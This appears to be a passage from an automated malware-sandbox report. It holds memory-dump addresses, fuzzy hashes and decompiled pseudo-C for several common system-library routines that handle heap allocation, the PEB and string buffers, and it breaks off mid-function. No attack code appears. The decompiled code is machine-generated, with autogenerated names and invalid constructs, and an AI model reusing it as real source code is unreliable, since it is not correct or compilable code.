                                      0x053b2d8d
                                      0x053b2d94
                                      0x053b2d94
                                      0x053b2d9f
                                      0x053b2da4
                                      0x053b2dab
                                      0x053b2db0
                                      0x053b2db2
                                      0x053b2db3
                                      0x053b2db4
                                      0x053b2dbc
                                      0x053b2dc3
                                      0x053b2dc3
                                      0x0536c205
                                      0x0536c205
                                      0x0536c208
                                      0x0536c20e
                                      0x0536c211
                                      0x0536c216
                                      0x0536c219
                                      0x0536c21f
                                      0x0536c222
                                      0x0536c22c
                                      0x0536c234
                                      0x0536c23a
                                      0x0536c23f
                                      0x0536c245
                                      0x0536c24b
                                      0x0536c251
                                      0x0536c25a
                                      0x0536c276
                                      0x0536c27d
                                      0x0536c27d
                                      0x0536c25c
                                      0x0536c25c
                                      0x00000000
                                      0x0536c25e
                                      0x0536c1a4
                                      0x0536c1aa
                                      0x0536c1b3
                                      0x0536c265
                                      0x0536c26c
                                      0x0536c26c
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                      • Instruction ID: 763f0866e0d9865eb1c75953d3c739b1555ee8a0e2c71da5194338138de690a9
                                      • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                      • Instruction Fuzzy Hash: 8531267170158AAEDB04EBB4C494BEAF769BF42204F04D15ED85887205DB786A09CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 053C7016, Relevance: .1, Instructions: 104COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 76%
                                      			E053C7016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x543d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E053C6B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E053C6B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E05367D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E05389AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E0538B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L05364620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















                                      0x053c7016
                                      0x053c701e
                                      0x053c702b
                                      0x053c7033
                                      0x053c7037
                                      0x053c703c
                                      0x053c703e
                                      0x053c7041
                                      0x053c7045
                                      0x053c704a
                                      0x053c7050
                                      0x053c7055
                                      0x053c705a
                                      0x053c7062
                                      0x053c7062
                                      0x053c705a
                                      0x053c7064
                                      0x053c7064
                                      0x053c7067
                                      0x053c7071
                                      0x053c7096
                                      0x053c709b
                                      0x053c70a2
                                      0x053c70a6
                                      0x053c70a7
                                      0x053c70ad
                                      0x053c70b3
                                      0x053c70b6
                                      0x053c70bb
                                      0x053c70c3
                                      0x053c70c3
                                      0x053c70c6
                                      0x053c70cd
                                      0x053c70dd
                                      0x053c70e0
                                      0x053c70e2
                                      0x053c70e2
                                      0x053c70ee
                                      0x053c7101
                                      0x053c70f0
                                      0x053c70f9
                                      0x053c70f9
                                      0x053c710a
                                      0x053c710e
                                      0x053c7112
                                      0x053c7117
                                      0x053c7118
                                      0x053c7118
                                      0x053c70bb
                                      0x053c711d
                                      0x053c7123
                                      0x053c7131
                                      0x053c7131
                                      0x053c7136
                                      0x053c713d
                                      0x053c713e
                                      0x053c713f
                                      0x053c714a
                                      0x053c714a
                                      0x053c7084
                                      0x053c7088
                                      0x00000000
                                      0x053c708e
                                      0x053c708e
                                      0x053c7092
                                      0x00000000
                                      0x053c7092

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: aae76852dc170697d977430cf429ef918f1f9352d7e01e541057939acde3ad65
                                      • Instruction ID: 4bb435057474ce352cc3dad6587335482703ec7633d678565e6e845f8771fdd3
                                      • Opcode Fuzzy Hash: aae76852dc170697d977430cf429ef918f1f9352d7e01e541057939acde3ad65
                                      • Instruction Fuzzy Hash: AB31A4726087519FC324DF28C945A6AB7E9FF88700F044A6DFC9687690E770ED04CBA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0537A70E, Relevance: .1, Instructions: 96COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 92%
                                      			E0537A70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x5437b10; // 0x10
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x5437b10 = 8;
					 *0x5437b14 = 0x5437b0c;
					 *0x5437b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x11
					E0537A990(0x5437b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L0537A840(__edx, __ecx, __ecx, _t52, 0x5437b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x5437b10; // 0x10
					_t3 = _t37 + 0x27; // 0x37
					__eflags = _t3 >> 5 -  *0x5437b18; // 0x1
					if(__eflags > 0) {
						_t38 =  *0x5437b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x37
						_v8 = _t4 >> 5;
						_t50 = L05364620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x5437b18 = _v8;
						_t8 = _t52 + 7; // 0x17
						E0538F3E0(_t50,  *0x5437b14, _t8 >> 3);
						_t28 =  *0x5437b14; // 0x771c7b0c
						__eflags = _t28 - 0x5437b0c;
						if(_t28 != 0x5437b0c) {
							L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x18
						 *0x5437b14 = _t50;
						_t48 = _v12;
						 *0x5437b10 = _t9;
						goto L6;
					}
					 *0x5437b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}
















                                      0x0537a713
                                      0x0537a714
                                      0x0537a717
                                      0x0537a71d
                                      0x0537a720
                                      0x0537a722
                                      0x0537a727
                                      0x0537a74a
                                      0x0537a754
                                      0x0537a75e
                                      0x0537a768
                                      0x0537a76a
                                      0x0537a773
                                      0x0537a78b
                                      0x0537a790
                                      0x0537a792
                                      0x0537a741
                                      0x0537a741
                                      0x0537a743
                                      0x0537a749
                                      0x0537a749
                                      0x0537a732
                                      0x0537a73a
                                      0x0537a797
                                      0x0537a79d
                                      0x0537a7a3
                                      0x0537a7a9
                                      0x0537a7b6
                                      0x0537a7bc
                                      0x0537a7ca
                                      0x0537a7e0
                                      0x0537a7e2
                                      0x0537a7e4
                                      0x053b9bf2
                                      0x00000000
                                      0x053b9bf2
                                      0x0537a7ed
                                      0x0537a7f2
                                      0x0537a800
                                      0x0537a805
                                      0x0537a80d
                                      0x0537a812
                                      0x053b9c08
                                      0x053b9c08
                                      0x0537a818
                                      0x0537a81b
                                      0x0537a821
                                      0x0537a824
                                      0x00000000
                                      0x0537a824
                                      0x0537a7ae
                                      0x00000000
                                      0x0537a7ae
                                      0x0537a73c
                                      0x0537a73e
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 88a70bace32aa6973b08e63da0eae5a2860495ad529e88f6443dddf8aeac0c35
                                      • Instruction ID: e06f006f445638364457a12b82972df024a42415c2c9df70a6199412613b7cd0
                                      • Opcode Fuzzy Hash: 88a70bace32aa6973b08e63da0eae5a2860495ad529e88f6443dddf8aeac0c35
                                      • Instruction Fuzzy Hash: 373126F17182089FC725CF48D88AFA97BFAF784344F10095AF0A1C7255DBB49A00CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 053761A0, Relevance: .1, Instructions: 93COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 97%
                                      			E053761A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E05375E50(0x53267cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E05419D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E0534F7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}



















                                      0x053761b3
                                      0x053761b5
                                      0x053761bd
                                      0x053761c3
                                      0x053761c7
                                      0x053761d2
                                      0x053761ff
                                      0x053761ff
                                      0x05376201
                                      0x05376207
                                      0x05376207
                                      0x053761d4
                                      0x053761d9
                                      0x00000000
                                      0x00000000
                                      0x053761df
                                      0x053761e2
                                      0x00000000
                                      0x00000000
                                      0x053761e6
                                      0x053761e8
                                      0x053761ee
                                      0x053761ee
                                      0x053761f9
                                      0x053b762f
                                      0x053b7632
                                      0x053b7635
                                      0x053b7639
                                      0x053b7640
                                      0x053b766e
                                      0x053b7675
                                      0x00000000
                                      0x00000000
                                      0x053b7681
                                      0x053b7689
                                      0x053b768d
                                      0x053b7691
                                      0x053b7695
                                      0x053b7699
                                      0x053b76af
                                      0x053b76b5
                                      0x053b76b7
                                      0x053b76b7
                                      0x053b76d7
                                      0x053b76dc
                                      0x00000000
                                      0x053b76dc
                                      0x053b76a2
                                      0x053b76a9
                                      0x053b7651
                                      0x053b7653
                                      0x053b7653
                                      0x053b7656
                                      0x053b7656
                                      0x00000000
                                      0x053b7656
                                      0x053b7644
                                      0x053b7646
                                      0x053b7648
                                      0x053b7648
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 26ad216973f170ff0c6e30bb7a270010c949aeabec0b4087cf3d3ae9cc8935a5
                                      • Instruction ID: 294fa63cbaebc54bbc02d3e080b020325622bac3cf8c9081b24577e8bdb864bc
                                      • Opcode Fuzzy Hash: 26ad216973f170ff0c6e30bb7a270010c949aeabec0b4087cf3d3ae9cc8935a5
                                      • Instruction Fuzzy Hash: 5B31AC71A09705CFE760CF09C815BA6B7E9FB88B00F08496DE999DB751E7B4E804CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0534AA16, Relevance: .1, Instructions: 93COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 95%
                                      			E0534AA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x543d360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x5437b9c; // 0x0
					_t53 = L05364620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E0538B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E0538F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L05356C59(_t53, _t51, _t58) != 0) {
							_t28 = E05375E50(0x532c338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E0537B230(_v32, _v28, 0x532c2d8, 1,  &_v24);
								_t28 = E0534F7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}




















                                      0x0534aa25
                                      0x0534aa29
                                      0x0534aa2d
                                      0x0534aa30
                                      0x0534aa37
                                      0x0534aa3c
                                      0x053a4458
                                      0x053a4458
                                      0x053a4472
                                      0x053a4474
                                      0x053a4476
                                      0x0534aa64
                                      0x0534aa74
                                      0x053a447c
                                      0x053a4483
                                      0x053a4492
                                      0x0534aa52
                                      0x0534aa54
                                      0x0534aa5e
                                      0x053a44a8
                                      0x053a44ad
                                      0x053a44af
                                      0x053a44b6
                                      0x053a44b6
                                      0x053a44b9
                                      0x053a44bc
                                      0x053a44cd
                                      0x053a44d3
                                      0x053a44d6
                                      0x053a44e1
                                      0x053a44e1
                                      0x053a44e6
                                      0x053a44e8
                                      0x053a44fb
                                      0x053a44fb
                                      0x053a44e8
                                      0x00000000
                                      0x0534aa5e
                                      0x053a4476
                                      0x0534aa42
                                      0x0534aa46
                                      0x0534aa48
                                      0x0534aa4c
                                      0x00000000
                                      0x00000000
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 15bd9f891e6f07de2689c2d6e5ce382825e4f08112fd6cad557b5b9b01d61715
                                      • Instruction ID: 4453adaa415f68747537421110d1606d93c43246f46111c7273e199663175b4f
                                      • Opcode Fuzzy Hash: 15bd9f891e6f07de2689c2d6e5ce382825e4f08112fd6cad557b5b9b01d61715
                                      • Instruction Fuzzy Hash: AE31B472A00219ABCF149F64CD81ABFB7B9FF04700F014469F901D7150EB74AD11DBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05388EC7, Relevance: .1, Instructions: 92COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 93%
                                      			E05388EC7(void* __ecx, void* __edx) {
				signed int _v8;
				signed int* _v16;
				intOrPtr _v20;
				signed int* _v24;
				char* _v28;
				signed int* _v32;
				intOrPtr _v36;
				signed int* _v40;
				signed int* _v44;
				signed int* _v48;
				intOrPtr _v52;
				signed int* _v56;
				signed int* _v60;
				signed int* _v64;
				intOrPtr _v68;
				signed int* _v72;
				char* _v76;
				signed int* _v80;
				signed int _v84;
				signed int* _v88;
				intOrPtr _v92;
				signed int* _v96;
				intOrPtr _v100;
				signed int* _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				signed int* _v152;
				char _v156;
				signed int* _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x543d360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E05374E70(0x54386e4, 0x5389490, 0, 0);
					if( *0x54353e8 > 5 && E05388F33(0x54353e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x54353e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x54353e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x532bc46;
						_t48 = E053C7B9C(0x54353e8, 0x532bc46, _t67, 0x54353e8, _t70,  &_v140);
					}
				}
				return E0538B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}











































                                      0x05388ec7
                                      0x05388ed9
                                      0x05388edc
                                      0x05388ee6
                                      0x05388ee9
                                      0x05388eee
                                      0x05388efc
                                      0x05388f08
                                      0x053c1349
                                      0x053c1353
                                      0x053c135d
                                      0x053c1366
                                      0x053c136f
                                      0x053c1375
                                      0x053c137c
                                      0x053c1385
                                      0x053c1390
                                      0x053c1391
                                      0x053c139c
                                      0x053c139d
                                      0x053c13a6
                                      0x053c13ac
                                      0x053c13b2
                                      0x053c13b5
                                      0x053c13bc
                                      0x053c13bf
                                      0x053c13c2
                                      0x053c13c5
                                      0x053c13c8
                                      0x053c13cb
                                      0x053c13ce
                                      0x053c13d1
                                      0x053c13d4
                                      0x053c13d7
                                      0x053c13da
                                      0x053c13dd
                                      0x053c13e0
                                      0x053c13e3
                                      0x053c13e6
                                      0x053c13e9
                                      0x053c13f6
                                      0x053c1400
                                      0x053c1400
                                      0x05388f08
                                      0x05388f32

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9e3b9bf02329b9e00919fa002a1db0aeb46963c4524ca1daa1fbe9f285f6eaf8
                                      • Instruction ID: 3d173b3b2d14a0efcdb84b10d5b737725223e9c767c031751234ab1e9c20aa16
                                      • Opcode Fuzzy Hash: 9e3b9bf02329b9e00919fa002a1db0aeb46963c4524ca1daa1fbe9f285f6eaf8
                                      • Instruction Fuzzy Hash: A04190B1D003189EDB24DFAAD981AEDFBF8FB48310F5041AEE519A7201D7705A44CF60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05384A2C, Relevance: .1, Instructions: 92COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 58%
                                      			E05384A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x543d360 ^ _t62;
				_v8 =  *0x543d360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E05362280(_t26, 0x5438608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E0535FFB0(_t41, _t51, 0x5438608);
						L2:
						 *0x543b1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E0538B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E05362280(_t28, 0x5438608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E0535FFB0(_t42, _t53, 0x5438608);
							if(_t53 != 0) {
								L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E0535FFB0(_t41, _t51, 0x5438608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}
























                                      0x05384a2c
                                      0x05384a34
                                      0x05384a3c
                                      0x05384a3e
                                      0x05384a48
                                      0x05384a4b
                                      0x05384a4d
                                      0x05384a51
                                      0x05384a9c
                                      0x00000000
                                      0x00000000
                                      0x05384aa3
                                      0x05384aa8
                                      0x05384aad
                                      0x05384ab1
                                      0x05384ade
                                      0x05384ae3
                                      0x05384a5a
                                      0x05384a62
                                      0x05384a6a
                                      0x05384a6e
                                      0x053bf203
                                      0x05384a84
                                      0x05384a88
                                      0x05384a89
                                      0x05384a8a
                                      0x05384a95
                                      0x05384a95
                                      0x05384a79
                                      0x05384a80
                                      0x05384af2
                                      0x05384af4
                                      0x05384af9
                                      0x05384aff
                                      0x05384b01
                                      0x05384b03
                                      0x05384b08
                                      0x053bf20a
                                      0x053bf212
                                      0x053bf216
                                      0x053bf216
                                      0x05384b08
                                      0x05384b13
                                      0x05384b1a
                                      0x053bf229
                                      0x053bf229
                                      0x05384b1a
                                      0x05384a82
                                      0x00000000
                                      0x05384a82
                                      0x05384ab7
                                      0x05384acd
                                      0x05384acd
                                      0x05384ad5
                                      0x05384ada
                                      0x00000000
                                      0x05384ada
                                      0x05384ac2
                                      0x05384acb
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x05384acb
                                      0x05384a53
                                      0x05384a53
                                      0x05384a58
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 38c56bc569fe05610a8ca0e0c5c879c6a931d5619cbc06e666933219044e4620
                                      • Instruction ID: 4a67ce73f650772a4baff2742a4e849524f4b9e6d87967d2f878d51393c460de
                                      • Opcode Fuzzy Hash: 38c56bc569fe05610a8ca0e0c5c879c6a931d5619cbc06e666933219044e4620
                                      • Instruction Fuzzy Hash: 1931443230A3429BCB25EF14C945B7AFBA6FF84B18F015469F8520BE50CBB8D800CB85
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0537E730, Relevance: .1, Instructions: 89COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 74%
                                      			E0537E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E05389670() < 0) {
					L0539DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
